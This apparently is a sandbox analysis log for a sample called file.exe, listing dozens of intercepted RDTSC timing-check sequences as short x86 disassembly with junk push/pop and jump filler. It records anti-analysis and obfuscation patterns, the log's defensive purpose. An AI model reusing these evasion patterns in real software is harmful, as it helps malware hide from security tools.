Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E081 second address: 66E090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E644F7526h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E090 second address: 66E096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E096 second address: 66E09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E09A second address: 66E09E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E09E second address: 66E0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E0BC second address: 66E0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E1FF second address: 66E21E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F6E644F7526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jng 00007F6E644F7526h 0x00000013 pop edx 0x00000014 pushad 0x00000015 ja 00007F6E644F7526h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E21E second address: 66E230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F6E64DC24B6h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E230 second address: 66E236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E236 second address: 66E23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675E6B second address: 675E82 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E644F7531h 0x00000008 jmp 00007F6E644F752Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675E82 second address: 675E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676124 second address: 676147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007F6E644F753Ah 0x0000000b jmp 00007F6E644F7534h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676147 second address: 67614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67614B second address: 67614F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67614F second address: 676155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765B7 second address: 6765D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F6E644F7526h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jnc 00007F6E644F7526h 0x00000011 ja 00007F6E644F7526h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765D0 second address: 6765DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765DD second address: 6765E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765E3 second address: 6765E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676871 second address: 67689E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Bh 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F6E644F7535h 0x00000010 jo 00007F6E644F7526h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6772C9 second address: 6772EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6E64DC24B6h 0x0000000a jmp 00007F6E64DC24C7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6772EA second address: 6772EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6772EE second address: 677305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F6E64DC24B6h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677305 second address: 67731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67731F second address: 677329 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7B6 second address: 67A7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E644F752Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7C7 second address: 67A7CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7CC second address: 67A7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7D2 second address: 67A7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E64DC24C1h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7EE second address: 67A7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A967 second address: 67A96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67B055 second address: 67B05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EBF1 second address: 67EBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EBF5 second address: 67EC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EC11 second address: 67EC28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EC28 second address: 67EC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ED9B second address: 67EDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EDA5 second address: 67EDA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F04F second address: 67F05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6E64DC24B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F05A second address: 67F07F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E644F7539h 0x00000008 jmp 00007F6E644F7533h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F07F second address: 67F083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F083 second address: 67F09D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7536h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F09D second address: 67F0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F0A3 second address: 67F0B2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAD1B second address: 5EAD2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6860EE second address: 6860F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6860F2 second address: 6860FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686273 second address: 686280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686568 second address: 68656E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686851 second address: 686861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F6E644F752Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686861 second address: 686873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6E64DC24C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686873 second address: 686880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6E644F7526h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686880 second address: 686885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DB4 second address: 686DBC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DBC second address: 686DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F6E64DC24B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DC8 second address: 686DEA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E644F7526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jc 00007F6E644F7526h 0x00000013 jnp 00007F6E644F7526h 0x00000019 pop ebx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DEA second address: 686E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686E04 second address: 686E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687638 second address: 68763C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C8CC second address: 68C8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C8D0 second address: 68C8FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007F6E64DC24BCh 0x0000000e jmp 00007F6E64DC24C8h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C8FF second address: 68C905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C905 second address: 68C914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007F6E64DC24B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C914 second address: 68C918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68BFB4 second address: 68BFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68BFB8 second address: 68BFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C104 second address: 68C10E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C10E second address: 68C112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C2A3 second address: 68C2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C533 second address: 68C537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C537 second address: 68C56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F6E64DC24C9h 0x00000014 push esi 0x00000015 jnl 00007F6E64DC24B6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C56D second address: 68C572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C572 second address: 68C58E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pushad 0x00000008 je 00007F6E64DC24B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699A7D second address: 699A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699A87 second address: 699A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F6E64DC24B8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699A9D second address: 699ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F6E644F7526h 0x0000000b jmp 00007F6E644F7530h 0x00000010 popad 0x00000011 jo 00007F6E644F7536h 0x00000017 jmp 00007F6E644F752Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699ACB second address: 699AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6E64DC24BDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699AE0 second address: 699B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E644F7538h 0x0000000e ja 00007F6E644F7526h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697BE8 second address: 697BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69827E second address: 698282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6983DC second address: 6983E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69852A second address: 698530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 698530 second address: 698538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987B7 second address: 6987BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987BC second address: 6987C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987C2 second address: 6987C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987C6 second address: 6987CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987CA second address: 6987EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E644F7535h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987EF second address: 6987F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69913F second address: 699145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699912 second address: 699916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A07EA second address: 6A07FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007F6E644F753Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A07FC second address: 6A082E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6E64DC24C8h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A082E second address: 6A0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7533h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0845 second address: 6A0849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0374 second address: 6A037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A04E6 second address: 6A04EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B0777 second address: 6B0782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B0782 second address: 6B0792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E64DC24B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B80D0 second address: 6B80DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F6E644F7528h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10C2 second address: 6C10C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10C8 second address: 6C10E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10E0 second address: 6C10E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C47CF second address: 6C47D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7D51 second address: 6C7D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
